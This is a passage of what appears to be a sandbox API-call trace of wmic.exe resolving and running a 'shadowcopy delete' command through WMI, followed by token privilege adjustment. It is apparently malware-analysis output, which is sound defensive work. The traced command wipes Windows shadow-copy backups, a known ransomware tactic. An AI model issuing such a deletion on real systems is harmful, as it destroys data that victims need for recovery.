returned 3 [0130.362] lstrlenW (lpString="CONTEXT") returned 7 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.362] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0130.362] lstrlenW (lpString="shadowcopy") returned 10 [0130.363] malloc (_Size=0x16) returned 0x19ac755d930 [0130.363] lstrlenW (lpString="shadowcopy") returned 10 [0130.363] GetCurrentThreadId () returned 0x484 [0130.363] ??0CHString@@QEAA@XZ () returned 0x21a13ff9d0 [0130.363] malloc (_Size=0x18) returned 0x19ac755dbf0 [0130.363] malloc (_Size=0x18) returned 0x19ac755da70 [0130.363] WbemLocator:IWbemLocator:ConnectServer (in: This=0x19ac731c900, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff7140f7898 | out: ppNamespace=0x7ff7140f7898*=0x19ac7376450) returned 0x0 [0133.928] free (_Block=0x19ac755da70) [0133.928] free (_Block=0x19ac755dbf0) [0133.928] CoSetProxyBlanket (pProxy=0x19ac7376450, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0133.928] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0133.929] GetCurrentThreadId () returned 0x484 [0133.929] ??0CHString@@QEAA@XZ () returned 0x21a13ff868 [0133.929] malloc (_Size=0x18) returned 0x19ac755dad0 [0133.929] malloc (_Size=0x18) returned 0x19ac755d8d0 [0133.929] malloc (_Size=0x18) returned 0x19ac755da10 [0133.929] malloc (_Size=0x18) returned 0x19ac755de70 [0133.929] SysStringLen (param_1="root\\cli") returned 0x8 [0133.929] SysStringLen (param_1="\\") returned 0x1 [0133.929] malloc (_Size=0x18) returned 0x19ac755d9d0 [0133.929] SysStringLen (param_1="root\\cli\\") returned 0x9 [0133.929] SysStringLen (param_1="ms_409") returned 0x6 [0133.929] free (_Block=0x19ac755de70) [0133.929] free (_Block=0x19ac755da10) [0133.930] free (_Block=0x19ac755d8d0) [0133.930] free (_Block=0x19ac755dad0) [0133.930] malloc (_Size=0x18) returned 0x19ac755d850 [0133.930] WbemLocator:IWbemLocator:ConnectServer (in: This=0x19ac731c900, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff7140f78a0 | out: ppNamespace=0x7ff7140f78a0*=0x19ac7375e20) returned 0x0 [0134.621] free (_Block=0x19ac755d850) [0134.622] free (_Block=0x19ac755d9d0) [0134.622] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.622] GetCurrentThreadId () returned 0x484 [0134.622] ??0CHString@@QEAA@XZ () returned 0x21a13ff9e8 [0134.622] malloc (_Size=0x18) returned 0x19ac755def0 [0134.622] malloc (_Size=0x18) returned 0x19ac755dcf0 [0134.622] malloc (_Size=0x18) returned 0x19ac755dd90 [0134.622] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0134.622] malloc (_Size=0x3a) returned 0x19ac755eb90 [0134.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff7140dac40, cbMultiByte=-1, lpWideCharStr=0x19ac755eb90, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0134.622] free (_Block=0x19ac755eb90) [0134.622] malloc (_Size=0x18) returned 0x19ac755da30 [0134.622] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0134.622] SysStringLen (param_1="shadowcopy") returned 0xa [0134.622] malloc (_Size=0x18) returned 0x19ac755d850 [0134.622] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0134.622] SysStringLen (param_1="'") returned 0x1 [0134.623] free (_Block=0x19ac755da30) [0134.623] free (_Block=0x19ac755dd90) [0134.623] free (_Block=0x19ac755dcf0) [0134.623] free (_Block=0x19ac755def0) [0134.623] IWbemServices:GetObject (in: This=0x19ac7376450, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x21a13ff910*=0x0, ppCallResult=0x0 | out: ppObject=0x21a13ff910*=0x19ac73871a0, ppCallResult=0x0) returned 0x0 [0134.710] malloc (_Size=0x18) returned 0x19ac755da70 [0134.710] IWbemClassObject:Get (in: This=0x19ac73871a0, wszName="Target", lFlags=0, pVal=0x21a13ff928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.711] free (_Block=0x19ac755da70) [0134.711] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.711] malloc (_Size=0x3e) returned 0x19ac755eb90 [0134.711] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.711] malloc (_Size=0x18) returned 0x19ac755d870 [0134.711] IWbemClassObject:Get (in: This=0x19ac73871a0, wszName="PWhere", lFlags=0, pVal=0x21a13ff928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.711] free (_Block=0x19ac755d870) [0134.711] lstrlenW (lpString=" Where ID = '#'") returned 15 [0134.711] malloc (_Size=0x20) returned 0x19ac755ebe0 [0134.711] lstrlenW (lpString=" Where ID = '#'") returned 15 [0134.711] malloc (_Size=0x18) returned 0x19ac755def0 [0134.711] IWbemClassObject:Get (in: This=0x19ac73871a0, wszName="Connection", lFlags=0, pVal=0x21a13ff928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff928*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19ac7387450, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.712] free (_Block=0x19ac755def0) [0134.712] IUnknown:QueryInterface (in: This=0x19ac7387450, riid=0x7ff7140e0598*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x21a13ff918 | out: ppvObject=0x21a13ff918*=0x19ac7387450) returned 0x0 [0134.712] GetCurrentThreadId () returned 0x484 [0134.712] ??0CHString@@QEAA@XZ () returned 0x21a13ff838 [0134.712] malloc (_Size=0x18) returned 0x19ac755dc30 [0134.712] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="Namespace", lFlags=0, pVal=0x21a13ff840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.712] free (_Block=0x19ac755dc30) [0134.712] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0134.712] malloc (_Size=0x16) returned 0x19ac755dd90 [0134.712] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0134.712] malloc (_Size=0x18) returned 0x19ac755dbf0 [0134.712] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="Locale", lFlags=0, pVal=0x21a13ff840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19ac7366b08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.712] free (_Block=0x19ac755dbf0) [0134.712] lstrlenW (lpString="ms_409") returned 6 [0134.712] malloc (_Size=0xe) returned 0x19ac755d870 [0134.712] lstrlenW (lpString="ms_409") returned 6 [0134.712] malloc (_Size=0x18) returned 0x19ac755db90 [0134.712] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="User", lFlags=0, pVal=0x21a13ff840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19ac7366b08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.713] free (_Block=0x19ac755db90) [0134.713] malloc (_Size=0x18) returned 0x19ac755dbf0 [0134.713] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="Password", lFlags=0, pVal=0x21a13ff840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.713] free (_Block=0x19ac755dbf0) [0134.713] malloc (_Size=0x18) returned 0x19ac755de70 [0134.713] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="Server", lFlags=0, pVal=0x21a13ff840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.713] free (_Block=0x19ac755de70) [0134.713] lstrlenW (lpString=".") returned 1 [0134.713] malloc (_Size=0x4) returned 0x19ac7555f60 [0134.713] lstrlenW (lpString=".") returned 1 [0134.713] malloc (_Size=0x18) returned 0x19ac755d890 [0134.713] IWbemClassObject:Get (in: This=0x19ac7387450, wszName="Authority", lFlags=0, pVal=0x21a13ff840*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19ac7366b08, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff840*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.713] free (_Block=0x19ac755d890) [0134.713] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.713] IUnknown:Release (This=0x19ac7387450) returned 0x1 [0134.714] GetCurrentThreadId () returned 0x484 [0134.714] ??0CHString@@QEAA@XZ () returned 0x21a13ff838 [0134.714] malloc (_Size=0x18) returned 0x19ac755d8b0 [0134.714] IWbemClassObject:Get (in: This=0x19ac73871a0, wszName="__RELPATH", lFlags=0, pVal=0x21a13ff848*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff848*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.714] free (_Block=0x19ac755d8b0) [0134.714] malloc (_Size=0x18) returned 0x19ac755d890 [0134.714] GetCurrentThreadId () returned 0x484 [0134.714] ??0CHString@@QEAA@XZ () returned 0x21a13ff708 [0134.714] ??0CHString@@QEAA@PEBG@Z () returned 0x21a13ff720 [0134.714] ??0CHString@@QEAA@AEBV0@@Z () returned 0x21a13ff698 [0134.714] ?Empty@CHString@@QEAAXXZ () returned 0x7ffce127674c [0134.714] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x19ac755ec10 [0134.714] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0134.714] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x21a13ff6a8 [0134.714] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x21a13ff6a0 [0134.715] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x21a13ff720 [0134.715] ??1CHString@@QEAA@XZ () returned 0x1 [0134.715] ??1CHString@@QEAA@XZ () returned 0x1 [0134.715] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x21a13ff670 [0134.715] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x21a13ff698 [0134.715] ??1CHString@@QEAA@XZ () returned 0x1 [0134.715] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x19ac755ec80 [0134.715] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0134.715] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x21a13ff6a8 [0134.715] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x21a13ff6a0 [0134.715] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x21a13ff720 [0134.715] ??1CHString@@QEAA@XZ () returned 0x1 [0134.715] ??1CHString@@QEAA@XZ () returned 0x1 [0134.715] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x21a13ff670 [0134.715] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x21a13ff698 [0134.715] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.715] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7ffce1276740 [0134.715] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.715] malloc (_Size=0x18) returned 0x19ac755d950 [0134.715] malloc (_Size=0x18) returned 0x19ac755ddb0 [0134.715] malloc (_Size=0x18) returned 0x19ac755d8b0 [0134.716] malloc (_Size=0x18) returned 0x19ac755d9d0 [0134.716] malloc (_Size=0x18) returned 0x19ac755da70 [0134.716] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0134.716] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0134.716] malloc (_Size=0x18) returned 0x19ac755dad0 [0134.716] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0134.716] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0134.716] malloc (_Size=0x18) returned 0x19ac755df10 [0134.716] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0134.716] SysStringLen (param_1="\"") returned 0x1 [0134.716] free (_Block=0x19ac755dad0) [0134.716] free (_Block=0x19ac755da70) [0134.716] free (_Block=0x19ac755d9d0) [0134.716] free (_Block=0x19ac755d8b0) [0134.716] free (_Block=0x19ac755ddb0) [0134.716] free (_Block=0x19ac755d950) [0134.716] IWbemServices:GetObject (in: This=0x19ac7375e20, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x21a13ff6e8*=0x0, ppCallResult=0x0 | out: ppObject=0x21a13ff6e8*=0x19ac7387e30, ppCallResult=0x0) returned 0x0 [0134.723] malloc (_Size=0x18) returned 0x19ac755dd30 [0134.723] IWbemClassObject:Get (in: This=0x19ac7387e30, wszName="Text", lFlags=0, pVal=0x21a13ff730*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x21a13ff730*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19ac736b770*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x19ac7367970, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0134.723] free (_Block=0x19ac755dd30) [0134.723] SafeArrayGetLBound (in: psa=0x19ac736b770, nDim=0x1, plLbound=0x21a13ff6fc | out: plLbound=0x21a13ff6fc) returned 0x0 [0134.723] SafeArrayGetUBound (in: psa=0x19ac736b770, nDim=0x1, plUbound=0x21a13ff700 | out: plUbound=0x21a13ff700) returned 0x0 [0134.723] SafeArrayGetElement (in: psa=0x19ac736b770, rgIndices=0x21a13ff6f8, pv=0x21a13ff710 | out: pv=0x21a13ff710) returned 0x0 [0134.723] malloc (_Size=0x18) returned 0x19ac755da70 [0134.723] malloc (_Size=0x18) returned 0x19ac755ddb0 [0134.723] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0134.723] free (_Block=0x19ac755da70) [0134.723] IUnknown:Release (This=0x19ac7387e30) returned 0x0 [0134.723] free (_Block=0x19ac755df10) [0134.723] ??1CHString@@QEAA@XZ () returned 0x1 [0134.723] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.723] free (_Block=0x19ac755d890) [0134.724] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.724] lstrlenW (lpString="Shadow copy management.") returned 23 [0134.724] malloc (_Size=0x30) returned 0x19ac755aa80 [0134.724] lstrlenW (lpString="Shadow copy management.") returned 23 [0134.724] free (_Block=0x19ac755ddb0) [0134.724] IUnknown:Release (This=0x19ac73871a0) returned 0x0 [0134.724] free (_Block=0x19ac755d850) [0134.724] ??1CHString@@QEAA@XZ () returned 0x7ffce127674c [0134.724] lstrlenW (lpString="PATH") returned 4 [0134.724] lstrlenW (lpString="delete") returned 6 [0134.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0134.724] lstrlenW (lpString="WHERE") returned 5 [0134.724] lstrlenW (lpString="delete") returned 6 [0134.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0134.724] lstrlenW (lpString="(") returned 1 [0134.724] lstrlenW (lpString="delete") returned 6 [0134.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0134.724] lstrlenW (lpString="/") returned 1 [0134.724] lstrlenW (lpString="delete") returned 6 [0134.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0134.724] lstrlenW (lpString="-") returned 1 [0134.724] lstrlenW (lpString="delete") returned 6 [0134.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0134.724] malloc (_Size=0x18) returned 0x19ac755d990 [0134.724] lstrlenW (lpString="GET") returned 3 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0134.725] lstrlenW (lpString="LIST") returned 4 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0134.725] lstrlenW (lpString="SET") returned 3 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0134.725] lstrlenW (lpString="CREATE") returned 6 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0134.725] lstrlenW (lpString="CALL") returned 4 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0134.725] lstrlenW (lpString="ASSOC") returned 5 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0134.725] lstrlenW (lpString="DELETE") returned 6 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0134.725] free (_Block=0x19ac755d990) [0134.725] lstrlenW (lpString="/") returned 1 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0134.725] lstrlenW (lpString="-") returned 1 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] malloc (_Size=0xe) returned 0x19ac755d850 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] lstrlenW (lpString="GET") returned 3 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.725] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0134.725] lstrlenW (lpString="LIST") returned 4 [0134.725] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0134.726] lstrlenW (lpString="SET") returned 3 [0134.726] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0134.726] lstrlenW (lpString="CREATE") returned 6 [0134.726] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0134.726] lstrlenW (lpString="CALL") returned 4 [0134.726] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0134.726] lstrlenW (lpString="ASSOC") returned 5 [0134.726] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0134.726] lstrlenW (lpString="DELETE") returned 6 [0134.726] lstrlenW (lpString="delete") returned 6 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0134.726] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.726] malloc (_Size=0x3e) returned 0x19ac755ec10 [0134.726] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0134.726] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0134.726] malloc (_Size=0x18) returned 0x19ac755da90 [0134.726] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x65006c00650053 | out: _String=0x0, _Context=0x65006c00650053) returned="*" [0134.726] lstrlenW (lpString="FROM") returned 4 [0134.726] lstrlenW (lpString="*") returned 1 [0134.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0134.726] malloc (_Size=0x18) returned 0x19ac755d9d0 [0134.726] free (_Block=0x19ac755da90) [0134.726] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x19ac7290db0*="\x01\x01" | out: _String=0x0, _Context=0x19ac7290db0*="\x01\x01") returned="from" [0134.727] lstrlenW (lpString="FROM") returned 4 [0134.727] lstrlenW (lpString="from") returned 4 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0134.727] malloc (_Size=0x18) returned 0x19ac755db90 [0134.727] free (_Block=0x19ac755d9d0) [0134.727] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x19ac7290db0*="\x01\x01" | out: _String=0x0, _Context=0x19ac7290db0*="\x01\x01") returned="Win32_ShadowCopy" [0134.727] malloc (_Size=0x18) returned 0x19ac755de70 [0134.727] free (_Block=0x19ac755db90) [0134.727] free (_Block=0x19ac755ec10) [0134.727] free (_Block=0x19ac755de70) [0134.727] lstrlenW (lpString="SET") returned 3 [0134.727] lstrlenW (lpString="delete") returned 6 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0134.727] lstrlenW (lpString="CREATE") returned 6 [0134.727] lstrlenW (lpString="delete") returned 6 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0134.727] free (_Block=0x19ac755df70) [0134.727] malloc (_Size=0x8) returned 0x19ac755ec10 [0134.727] lstrlenW (lpString="GET") returned 3 [0134.727] lstrlenW (lpString="delete") returned 6 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0134.727] lstrlenW (lpString="LIST") returned 4 [0134.727] lstrlenW (lpString="delete") returned 6 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0134.727] lstrlenW (lpString="ASSOC") returned 5 [0134.727] lstrlenW (lpString="delete") returned 6 [0134.727] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0134.727] WbemLocator:IUnknown:AddRef (This=0x19ac731c900) returned 0x3 [0134.728] free (_Block=0x19ac7555b30) [0134.728] lstrlenW (lpString="") returned 0 [0134.728] lstrlenW (lpString="NQDPDE") returned 6 [0134.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0134.728] lstrlenW (lpString="NQDPDE") returned 6 [0134.728] malloc (_Size=0xe) returned 0x19ac755d950 [0134.728] lstrlenW (lpString="NQDPDE") returned 6 [0134.728] GetCurrentThreadId () returned 0x484 [0134.728] GetCurrentProcess () returned 0xffffffffffffffff [0134.728] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x21a13ffa70 | out: TokenHandle=0x21a13ffa70*=0x2b4) returned 1 [0134.728] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x21a13ffa68 | out: TokenInformation=0x0, ReturnLength=0x21a13ffa68) returned 0 [0134.728] malloc (_Size=0x118) returned 0x19ac755ec30 [0134.728] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x3, TokenInformation=0x19ac755ec30, TokenInformationLength=0x118, ReturnLength=0x21a13ffa68 | out: TokenInformation=0x19ac755ec30, ReturnLength=0x21a13ffa68) returned 1 [0134.728] AdjustTokenPrivileges (in: TokenHandle=0x2b4, DisableAllPrivileges=0, NewState=0x19ac755ec30*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1154567734, Attributes=0x1d78), (Luid.LowPart=0x19a, Luid.HighPart=-950707408, Attributes=0x19a), (Luid.LowPart=0x22, Luid.HighPart=637534246, Attributes=0x1d6f), (Luid.LowPart=0x19a, Luid.HighPart=-950730416, Attributes=0x19a), 